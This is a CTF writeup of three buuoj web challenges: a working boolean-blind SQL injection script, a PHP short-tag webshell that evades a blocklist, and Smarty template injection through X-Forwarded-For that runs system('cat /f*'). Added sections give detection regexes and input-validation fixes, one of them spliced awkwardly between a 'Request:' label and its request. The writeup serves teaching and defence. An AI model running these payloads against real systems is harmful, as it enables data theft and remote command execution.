Buuoj challenges (4)


Working through the web challenges on buuoj. I'm just a newbie collecting these, go easy on me (((

[WUSTCTF2020] 颜值成绩查询 (looks-score lookup)

The familiar lookup form: enter a number to query a score.

Entering 1' shows "student does not exist".

So ordinary quote-based injection fails.

Entering 1^1 also reports that the student does not exist,

while 1^0 returns admin. (1^1 evaluates to 0 and 1^0 to 1, so the database is evaluating the expression we supply; that true/false difference is exactly the oracle a blind injection needs.)

So boolean-based blind injection is the way to go.

```python
import requests
import time
import sys  # imports

url = "http://3fc79411-07ae-4931-9f8b-1fb09f15c605.node4.buuoj.cn:81/?stunum="

res = ""  # result
for i in range(1, 1000):  # one character per iteration
    left = 32
    right = 128
    mid = (left + right) // 2  # binary-search midpoint
    while left < right:
        # payload = url + "1^(ascii(substr(database(),%d,1))<%d)#" % (i, mid)  # database name
        # payload = url + "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)#" % (i, mid)  # table names
        # payload = url + "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))<%d)#" % (i, mid)  # column names
        payload = url + "1^(ascii(substr((select(group_concat(value))from(flag)),%d,1))<%d)#" % (i, mid)  # column values: the first %d receives i, the second receives mid; the database compares the character's ASCII code with mid, and the loop keeps narrowing while the comparison is '<'
        # payload = url + "1^(ascii(substr((select(reverse(group_concat(flag)))from(flag)),%d,1))<%d)#" % (i, mid)  # same as above, but with the string reversed
        html = requests.get(payload)
        print(payload)
        time.sleep(0.04)
        if "exists" in html.text:  # the comparison sent is '<'; a reply of ERROR is the correct (true) reaction
            right = mid  # condition held: mid becomes the new right bound, then compare ASCII against the midpoint of the new range (e.g. first ASCII vs 80; if below 80, next compare with (32+80)//2 = 56)
        else:
            left = mid + 1  # otherwise the ASCII value is >= mid: move the left bound to mid+1 and compare with the midpoint of the new range (e.g. 81..128)
        mid = (left + right) // 2  # repeat

    if mid <= 32 or mid >= 127:
        break  # stop once the result leaves printable ASCII
    res += chr(mid - 1)  # because the comparison is '<', the character is mid-1
    print(res)
    # print("Final Result:", res)
```
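From the defender's side, the loop above leaves a very recognisable trace: hundreds of requests from one client whose query strings differ only in two numbers (the position and the comparison threshold). The following Python is an added example, not part of the writeup or the challenge: it scans a few constructed access-log lines for the fingerprints of this technique (ascii(substr(...)), an XOR used in place of quotes, information_schema) and replaces digit runs with N so the binary-search burst collapses to a single payload shape per client. The log format, client addresses and every log line are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the challenge server): a binary-search
# blind-injection burst from one client, plus ordinary lookups from another.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Feb/2023:15:30:01 +0000] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.9 - - [25/Feb/2023:15:30:02 +0000] "GET /?stunum=1%5E(ascii(substr(database(),1,1))%3C80)%23 HTTP/1.1" 200 512
10.0.0.9 - - [25/Feb/2023:15:30:02 +0000] "GET /?stunum=1%5E(ascii(substr(database(),1,1))%3C104)%23 HTTP/1.1" 200 488
10.0.0.9 - - [25/Feb/2023:15:30:02 +0000] "GET /?stunum=1%5E(ascii(substr(database(),1,1))%3C116)%23 HTTP/1.1" 200 512
10.0.0.9 - - [25/Feb/2023:15:30:03 +0000] "GET /?stunum=1%5E(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))%3C80)%23 HTTP/1.1" 200 512
10.0.0.5 - - [25/Feb/2023:15:30:04 +0000] "GET /?stunum=42 HTTP/1.1" 200 512
"""

# Common-log-format line: client, ident, user, [time], "METHOD PATH PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Fingerprints of the boolean-blind technique used in the script above: a per-character
# oracle (ascii/substr), an XOR operator used where a quote would normally be needed,
# and schema enumeration through information_schema.
BLIND_PATTERNS = [
    re.compile(r"ascii\s*\(\s*substr", re.I),
    re.compile(r"\^\s*\(", re.I),
    re.compile(r"information_schema", re.I),
]


def is_blind_probe(raw_path: str) -> bool:
    """True if the URL-decoded request path carries a blind-SQLi fingerprint."""
    decoded = unquote_plus(raw_path)
    return any(p.search(decoded) for p in BLIND_PATTERNS)


def payload_shape(raw_path: str) -> str:
    """Normalise a decoded path by replacing digit runs with N, so a binary search that
    only varies the character position and the threshold collapses to one shape."""
    return re.sub(r"\d+", "N", unquote_plus(raw_path))


def analyze(log_text: str) -> dict:
    """Return {client_ip: (suspicious_request_count, distinct_shape_count)} for clients
    that sent at least one request matching a blind-injection fingerprint."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_blind_probe(m["path"]):
            hits[m["ip"]][payload_shape(m["path"])] += 1
    return {ip: (sum(c.values()), len(c)) for ip, c in hits.items()}


if __name__ == "__main__":
    for ip, (count, shapes) in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {count} blind-injection probes across {shapes} payload shape(s)")
```

A high probe count with very few distinct shapes is the signature of the binary search: the same statement template, sent once per bit of each character. Rate-limiting alone does not stop it (the script above already sleeps between requests); the fix is a parameterised query on stunum, with this detection as the alarm for when someone tries anyway.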

[红明谷CTF 2021] write shell

The source:

```php
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
    if(is_array($input)){
        foreach($input as $key=>$output){
            $input[$key] = waf($output);
        }
    }else{
        $input = check($input);
    }
}
# Checks whether the data being written matches the expression above; on a match it prints hacker and exits

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
# Creates a per-IP sandbox: if $dir does not exist, make the directory
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;//action=pwd prints the directory
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}//action=upload writes data into index.php inside the directory; if the data parameter is absent it is set to the empty string, and data must first pass the waf check
?>
```

So this part is simple: write our shell into $dir.

But how? The filter blocks spaces, single quotes, underscores, php, semicolons, tildes, curly braces, eval, + and ^.

PHP short tags

As covered in the earlier webshell post, <?=``?> amounts to command execution (backticks run a shell command),

and <?= is equivalent to echo.

So we can write it directly as:

```php
<?=`ls`?>
```

or

```php
<?echo%09system("ls")?>
```

Then proceed as for ordinary command execution: replace spaces with %09 (a tab), single quotes with double quotes, and visit the sandbox path to see the output.
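Why the short-tag payloads slip past the filter is easiest to see by running the same blocklist offline. The following Python is an added example, not code from the challenge or the writeup: it transcribes the preg_match pattern from the source above into a Python regex, runs it over the two payloads the writeup uses (with %09 already decoded to a tab), and compares it with a check that refuses any PHP open tag instead of listing bad substrings. The sample inputs are constructed.

```python
import re

# The challenge's blocklist, transcribed from the PHP preg_match above
# (same alternatives, case-insensitive). '{' and '}' are escaped for Python's re.
CHALLENGE_BLOCKLIST = re.compile(r"'| |_|php|;|~|\^|\+|eval|\{|\}", re.I)

# Any PHP open tag: '<?' covers '<?php', the short echo tag '<?=' and the bare
# short tag '<?' used in the writeup. Matching the tag targets what makes the
# written file executable, rather than guessing which substrings a payload needs.
PHP_OPEN_TAG = re.compile(r"<\?")


def blocked_by_challenge_waf(data: str) -> bool:
    """Mirror of check(): True when the challenge filter would die('hacker!!!')."""
    return CHALLENGE_BLOCKLIST.search(data) is not None


def contains_php_open_tag(data: str) -> bool:
    """Stricter check: True when the data contains any PHP open tag."""
    return PHP_OPEN_TAG.search(data) is not None


def classify(data: str) -> dict:
    """Run both checks over one input and report what each would do."""
    return {
        "challenge_waf": blocked_by_challenge_waf(data),
        "open_tag_check": contains_php_open_tag(data),
    }


# Constructed inputs: a harmless string, the classic long-form tag, and the two
# short-tag forms from the writeup (space encoded as %09 in the URL, i.e. a tab here).
SAMPLES = {
    "plain": "hello-world",
    "long_tag": "<?php echo 1; ?>",
    "short_echo": "<?=`ls`?>",
    "short_tab": "<?echo\tsystem(\"ls\")?>",
}


def classify_all() -> dict:
    """Classify every sample; keys are the sample names above."""
    return {name: classify(data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in classify_all().items():
        print(f"{name:11s} challenge_waf={verdict['challenge_waf']!s:5s} "
              f"open_tag_check={verdict['open_tag_check']}")
```

The blocklist never sees "php", a space or a quote in either short-tag payload (a tab is not a space, and backticks and double quotes are not listed), so both pass, while the open-tag check catches them along with the long form. Neither check replaces the real fix, which is not to write request data into a .php file under the web root at all; the tag check is defence in depth for an endpoint that must store user content.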

[CISCN2019 华东南赛区] Web11

A really easy one; it feels like it's not as good as the smarty challenge on 攻防世界…

The page shows an IP Address API

and says "Build with Smarty".

So it is presumably Smarty template injection through XFF. Open Burp, capture the request, and modify the XFF header to test:

Request:

```http
GET / HTTP/1.1
Host: node4.buuoj.cn:28697
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
X-Forwarded-For: {1+1}
X-Forwarded: {1+1}
Forwarded-For: {1+1}
Forwarded: {1+1}
X-Requested-With: {1+1}
X-Forwarded-Proto: {1+1}
X-Forwarded-Host: {1+1}
X-remote-IP: {1+1}
X-remote-addr: {1+1}
True-Client-IP: {1+1}
X-Client-IP: {1+1}
Client-IP: {1+1}
X-Real-IP: {1+1}
Ali-CDN-Real-IP: {1+1}
Cdn-Src-Ip: {1+1}
Cdn-Real-Ip: {1+1}
CF-Connecting-IP: {1+1}
X-Cluster-Client-IP: {1+1}
WL-Proxy-Client-IP: {1+1}
Proxy-Client-IP: {1+1}
Fastly-Client-Ip: {1+1}
True-Client-Ip: {1+1}
X-Originating-IP: {1+1}
X-Host: {1+1}
X-Custom-IP-Authorization: {1+1}
Content-Length: 2
```

Response:

```http
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 15:32:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.3.5
Content-Length: 3905

<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>A Simple IP Address API</title>
<link rel="stylesheet" href="./css/bootstrap.min.css">
</head>
<body>
<div class="container">
<div class="row">
<div style="float:left;">
<h1>IP</h1>
<h2 class="hidden-xs hidden-sm">A Simple Public IP Address API</h2>
</div>
<div style="float:right;margin-top:30px;">Current IP:2 </div>
<!-- note that Current IP here is 2 -->
</div>

<div class="why row">
<div class="col-xs-12">
<h2>Why use?</h2>
<div class="row">
<div class="col-xs-offset-1 col-xs-10">
<p>
Do you need to get the public IP address ? Do you have the requirements to obtain the servers’ public IP address? Whatever the reason,sometimes a public IP address API are useful.
</p>
<p>
You should use this because:
</p><ul>
<li>You can initiate requests without any limit.</li>

<li>Does not record the visitor information.</li>

</ul>
<p></p>
</div>
</div>
</div>
</div>
<div class="api row">
<div class="col-xs-12">
<h2>API Usage</h2>
<div class="row">
<div class="col-xs-offset-1 col-xs-11">

<div class="table-responsive">
<table class="table table-striped table-bordered table-hover">
<thead>
<tr>
<td>-</td>
<td>API URI</td>
<td width="50px">Type</td>
<td>Sample Output</td>
</tr>
</thead>
<tbody>
<tr>
<td>get IP</td>
<td><code>http://node4.buuoj.cn:28697/api</code></td>
<td><code>text/html</code></td>
<td><code>8.8.8.8</code></td>
</tr>
<tr>
<td>get XFF(X-Forwarded-For)</td>
<td><code>http://node4.buuoj.cn:28697/xff</code></td>
<td><code>text/html</code></td>
<td><code>8.8.8.8</code></td>
</tr>


</tbody>
</table>
</div>


</div>
</div>
</div>
</div>
<div class="examples row">

</div>

<div class="row">
<div class="col-xs-12">
<h2 style="margin-bottom:0;">Connection</h2>
<div class="row">
<div class="col-xs-offset-1 col-xs-10">
<h3>Request-Header</h3>
<pre>GET / HTTP/2.0
Host: www.ip.la
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8
Cache-Control: max-age=0
Dnt: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36

</pre>
</div>
</div>
</div>
</div>
<footer>
<p style="text-align:center;font-size:14px;">Build With Smarty !</p>
</footer>
</div>

</body></html>
```

We can see the addition was evaluated: the header value was rendered through the template engine as code, not as text.

Change the XFF header to: X-Forwarded-For: {system('ls /')}

Request:
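What makes this work is that a header the application treats as an IP address is handed to Smarty without ever being checked to be one. The Python below is an added example, not the challenge's code: it parses a constructed request like the one above, checks each client-address header against the standard ipaddress module, and derives the value a template should receive, falling back to the socket peer when the header is not an IP literal. The header names in CLIENT_IP_HEADERS are a subset of those sprayed in the request above, and the sample request is constructed.

```python
import ipaddress

# Headers a proxy-aware application may consult for the client address. Whichever
# of these the application trusts, it must validate the value before rendering it.
CLIENT_IP_HEADERS = (
    "x-forwarded-for", "x-real-ip", "client-ip", "x-client-ip", "true-client-ip",
    "cf-connecting-ip", "x-cluster-client-ip", "forwarded-for",
)


def parse_request_headers(raw: str) -> dict:
    """Parse the header block of a raw HTTP/1.1 request into a lower-cased dict.
    Repeated header names are joined with ", " (the list form RFC 9110 allows)."""
    headers = {}
    lines = raw.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:          # skip the request line
        if not line.strip():        # blank line ends the header block
            break
        name, _, value = line.partition(":")
        name = name.strip().lower()
        value = value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return headers


def is_ip_list(value: str) -> bool:
    """True only if every comma-separated element parses as an IPv4 or IPv6 address."""
    try:
        for part in value.split(","):
            ipaddress.ip_address(part.strip())
        return True
    except ValueError:
        return False


def offending_ip_headers(headers: dict) -> list:
    """Names of client-address headers whose value is not a list of IP literals."""
    return [h for h in CLIENT_IP_HEADERS if h in headers and not is_ip_list(headers[h])]


def client_ip_for_template(headers: dict, socket_peer: str) -> str:
    """The value it is safe to pass to the template: the first X-Forwarded-For hop if
    it is an IP literal, otherwise the address of the TCP peer. Anything that is not
    an IP (such as '{1+1}') is discarded rather than rendered."""
    xff = headers.get("x-forwarded-for", "")
    first = xff.split(",")[0].strip()
    return first if first and is_ip_list(first) else socket_peer


# Constructed request, shortened from the capture in the writeup.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: node4.buuoj.cn:28697\r\n"
    "X-Forwarded-For: {1+1}\r\n"
    "X-Real-IP: 8.8.8.8\r\n"
    "True-Client-IP: {system('ls /')}\r\n"
    "\r\n"
)

if __name__ == "__main__":
    hdrs = parse_request_headers(SAMPLE_REQUEST)
    print("rejected headers:", offending_ip_headers(hdrs))
    print("value for template:", client_ip_for_template(hdrs, "203.0.113.7"))
```

Validating the header as an IP literal removes the injection surface entirely, because no template syntax survives ipaddress.ip_address(). Independently of that, the rendered value should be passed to Smarty as a variable ($smarty->assign) rather than concatenated into the template source, so that even a string containing braces is displayed, not executed.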

```http
GET / HTTP/1.1
Host: node4.buuoj.cn:28697
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
X-Forwarded-For: {system('ls /')}
Content-Length: 4
```




Response:

```html
<div style="float:right;margin-top:30px;">Current IP:bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
usr
var
var </div>
</div>
```

It worked, so read the flag directly:

X-Forwarded-For: {system('cat /f*')}

Response:

```html
<div style="float:right;margin-top:30px;">Current IP:<?php $flag="flag{b9aaeb9b-a5d7-4908-bd35-f6b4763c1ac4}";
<?php $flag="flag{b9aaeb9b-a5d7-4908-bd35-f6b4763c1ac4}"; </div>
```